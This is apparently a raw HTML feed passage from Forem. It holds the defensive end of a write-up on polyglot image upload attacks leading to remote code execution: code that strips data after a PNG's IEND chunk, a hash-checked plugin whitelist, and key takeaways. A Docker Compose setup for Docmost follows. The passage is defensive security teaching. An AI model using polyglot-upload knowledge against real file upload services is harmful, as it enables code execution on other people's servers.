class="kd">const</span> <span class="nx">iendPos</span> <span class="o">=</span> <span class="nx">buffer</span><span class="p">.</span><span class="nf">indexOf</span><span class="p">(</span><span class="nx">Buffer</span><span class="p">.</span><span class="k">from</span><span class="p">(</span><span class="dl">"</span><span class="s2">IEND</span><span class="dl">"</span><span class="p">));</span> <span class="k">if </span><span class="p">(</span><span class="nx">iendPos</span> <span class="o">!==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">buffer</span><span class="p">.</span><span class="nf">slice</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nx">iendPos</span> <span class="o">+</span> <span class="mi">8</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">buffer</span><span class="p">;</span> <span class="p">}</span> </code></pre> </div> <h3> Secure File Processor </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="c1">// ✅ SECURE - Whitelist-based plugin loader</span> <span class="kd">const</span> <span class="nx">ALLOWED_PLUGINS</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Set</span><span class="p">([</span> <span class="dl">"</span><span class="s2">official-plugin-1.js</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">official-plugin-2.js</span><span class="dl">"</span><span class="p">,</span> <span class="p">]);</span> <span class="k">export</span> <span class="kd">function</span> <span class="nf">loadPlugin</span><span class="p">(</span><span class="nx">pluginName</span><span class="p">:</span> <span class="kr">string</span><span class="p">):</span> <span class="k">void</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">ALLOWED_PLUGINS</span><span class="p">.</span><span class="nf">has</span><span class="p">(</span><span class="nx">pluginName</span><span class="p">))</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="s2">`Plugin </span><span class="p">${</span><span class="nx">pluginName</span><span class="p">}</span><span class="s2"> not in whitelist`</span><span class="p">);</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">pluginPath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">PLUGINS_DIR</span><span class="p">,</span> <span class="nx">pluginName</span><span class="p">);</span> <span class="c1">// Verify file hasn't been modified (checksum)</span> <span class="kd">const</span> <span class="nx">expectedHash</span> <span class="o">=</span> <span class="nx">PLUGIN_HASHES</span><span class="p">[</span><span class="nx">pluginName</span><span class="p">];</span> <span class="kd">const</span> <span class="nx">actualHash</span> <span class="o">=</span> <span class="nx">crypto</span> <span class="p">.</span><span class="nf">createHash</span><span class="p">(</span><span class="dl">"</span><span class="s2">sha256</span><span class="dl">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">update</span><span class="p">(</span><span class="nx">fs</span><span class="p">.</span><span class="nf">readFileSync</span><span class="p">(</span><span class="nx">pluginPath</span><span class="p">))</span> <span class="p">.</span><span class="nf">digest</span><span class="p">(</span><span class="dl">"</span><span class="s2">hex</span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">actualHash</span> <span class="o">!==</span> <span class="nx">expectedHash</span><span class="p">)</span> <span class="p">{</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="s2">`Plugin </span><span class="p">${</span><span class="nx">pluginName</span><span class="p">}</span><span class="s2"> checksum mismatch`</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Safe to require</span> <span class="nf">require</span><span class="p">(</span><span class="nx">pluginPath</span><span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Conclusion </h2> <p>Polyglot image upload attacks are a serious security threat that can lead to remote code execution. The attack works by exploiting applications that:</p> <ol> <li>Save uploaded files with original extensions</li> <li>Process files without content validation</li> <li>Execute files from uploads directories</li> </ol> <p><strong>Key Takeaways:</strong></p> <ul> <li> <strong>Never trust file extensions</strong> - Always validate file content</li> <li> <strong>Never execute uploaded files</strong> - Use whitelists for any code execution</li> <li> <strong>Sanitize file contents</strong> - Strip trailing data, reprocess images</li> <li> <strong>Monitor file operations</strong> - Log and alert on suspicious activity</li> <li> <strong>Use defense in depth</strong> - Multiple layers of validation and security</li> </ul> <p>By implementing the prevention strategies outlined in this document, you can significantly reduce the risk of polyglot file upload attacks and protect your applications from this critical vulnerability.</p> <h2> References </h2> <ul> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html" rel="noopener noreferrer">OWASP File Upload Cheat Sheet</a></li> <li><a href="https://cwe.mitre.org/data/definitions/434.html" rel="noopener noreferrer">CWE-434: Unrestricted Upload of File with Dangerous Type</a></li> <li><a href="https://nodejs.org/en/docs/guides/security/" rel="noopener noreferrer">Node.js Security Best Practices</a></li> <li><a href="https://sharp.pixelplumbing.com/" rel="noopener noreferrer">Sharp Image Processing Library</a></li> </ul> <p><strong>Document Version</strong>: 1.0<br><br> <strong>Last Updated</strong>: 2025-12-17<br><br> <strong>Author</strong>: Porhong<br><br> <strong>Classification</strong>: Internal Security Documentation</p> polyglot remotecodeexecution programming webdev Keat Porhong Tue, 11 Feb 2025 10:30:51 +0000 https://forem.com/keat_porhong/docmost-with-docker-compose-58h2 https://forem.com/keat_porhong/docmost-with-docker-compose-58h2 <p><strong>Compose config</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>version: "3" services: docmost: image: docmost/docmost:latest container_name: docmost hostname: docmost user: root healthcheck: test: timeout 10s bash -c ':&gt; /dev/tcp/127.0.0.1/3000' || exit 1 interval: 10s timeout: 5s retries: 3 start_period: 90s depends_on: - docmost-db - docmost-redis environment: APP_URL: "${APP_URL}" APP_SECRET: "${APP_SECRET}" DATABASE_URL: "postgresql://${POSTGRES_USER}:${POSTGRES_PASSWORD}@docmost-db:5432/${POSTGRES_DB}?schema=public" REDIS_URL: "redis://docmost-redis:6379" ports: - "5031:3000" restart: unless-stopped volumes: - /disk-01/docker-data/docmost/docmost-storage:/app/data/storage docmost-db: image: postgres:16-alpine container_name: docmost-DB hostname: docmost-db healthcheck: test: ["CMD-SHELL", "pg_isready -U ${POSTGRES_USER} -d ${POSTGRES_DB}"] interval: 5s timeout: 5s retries: 5 volumes: - /disk-01/docker-data/docmost/docmost-db:/var/lib/postgresql/data:rw environment: POSTGRES_DB: ${POSTGRES_DB} POSTGRES_USER: ${POSTGRES_USER} POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} restart: on-failure:5 docmost-redis: image: redis:7.2-alpine container_name: docmost-redis hostname: docmost-redis restart: unless-stopped healthcheck: test: ["CMD-SHELL", "redis-cli ping || exit 1"] volumes: - /disk-01/docker-data/docmost/redis_data:/data </code></pre> </div> <p><strong>Environment config</strong></p> <p><code>APP_URL=<br> POSTGRES_DB=<br> POSTGRES_USER=<br> POSTGRES_PASSWORD=<br> APP_SECRET=''<br> MAIL_DRIVER=smtp<br> SMTP_HOST=<br> SMTP_PORT=<br> SMTP_USERNAME=<br> SMTP_PASSWORD=<br> MAIL_FROM_ADDRESS=<br> MAIL_FROM_NAME=</code></p>